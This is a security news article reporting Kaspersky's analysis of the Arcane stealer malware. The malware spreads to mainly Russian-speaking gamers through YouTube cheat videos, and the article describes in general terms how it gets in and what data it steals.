New Malware Targeting Gamers: Arcane Stealer Discovered
Recent reports have surfaced regarding a new strain of malware known as Arcane, disseminated through YouTube videos that advertise game cheats. This unique malware, particularly concerning for its sophisticated data collection methods, appears to primarily target Russian-speaking users, signaling a new wave of cyber threats aimed at gamers.
In an analysis conducted by Kaspersky, the malware has been noted for its capacity to gather extensive information, including account details from various VPN and gaming clients, as well as network utility applications like ngrok, Playit, Cyberduck, FileZilla, and DynDNS. The infection process involves links to password-protected archives provided in YouTube videos. When users open these files, a batch script executes, initiating a download of additional malicious components through PowerShell.
The batch file’s function does not end there. It executes two separate binaries from the downloaded archive while circumventing Windows SmartScreen protections, effectively neutralizing a layer of security that could potentially thwart the attack. Initial findings indicate that one of these binaries operates as a cryptocurrency miner, while the other, identified as VGS, has connections to a variant of Phemedrone stealer malware.
In a troubling development, instances of these attacks have recently transitioned from VGS to the more advanced Arcane. Although many of Arcane’s features seem borrowed from existing stealer malware, Kaspersky’s researchers have not been able to attribute it definitively to any known attack families.
Arcane is designed to harvest a wealth of sensitive data, including login credentials, passwords, credit card information, and cookies from a variety of widely used web browsers. Additionally, it can extract configuration files and settings from various applications, which encompass VPN services such as OpenVPN, NordVPN, and ExpressVPN; messaging platforms like Discord and Telegram; email clients including Microsoft Outlook; gaming services like Steam and Riot Client; and multiple cryptocurrency wallets.
The malware also has capabilities to capture screenshots of the compromised devices, inventory running processes, and list saved Wi-Fi networks along with associated passwords. This multi-faceted approach highlights a comprehensive tactic often seen within the adversarial landscape of cybercrime.
Kaspersky provides insight into the technical operations of Arcane, noting that it utilizes the Data Protection API (DPAPI) to access encryption keys that browsers normally generate for protecting sensitive data. An additional layer of complexity is introduced through the execution of a utility called Xaitax, which cracks these keys and allows the malware to extract critical information from console output with minimal detection.
Further complicating matters, the creators of Arcane have introduced a loader named ArcanaLoader, touted as a means for delivering game cheats but instead serving as a vehicle for the stealer malware. Analysis reveals that Russia, Belarus, and Kazakhstan are the primary targets of this campaign, raising alarms about the evolving strategies employed by cybercriminals.
This situation serves as a stark reminder of the adaptability and resourcefulness of threat actors, continuously refining their tools and distribution methods. Given the broad range of data Arcane collects and the obfuscation techniques it employs to do so, this incident exemplifies the need for heightened cybersecurity vigilance among users, particularly within the gaming community. The dynamics of such attacks resonate closely with the MITRE ATT&CK framework, which outlines strategies like initial access and persistence that are likely central to the deployment of Arcane. Business owners and tech professionals alike should take note of these emerging threats as they navigate the complex terrain of cybersecurity.
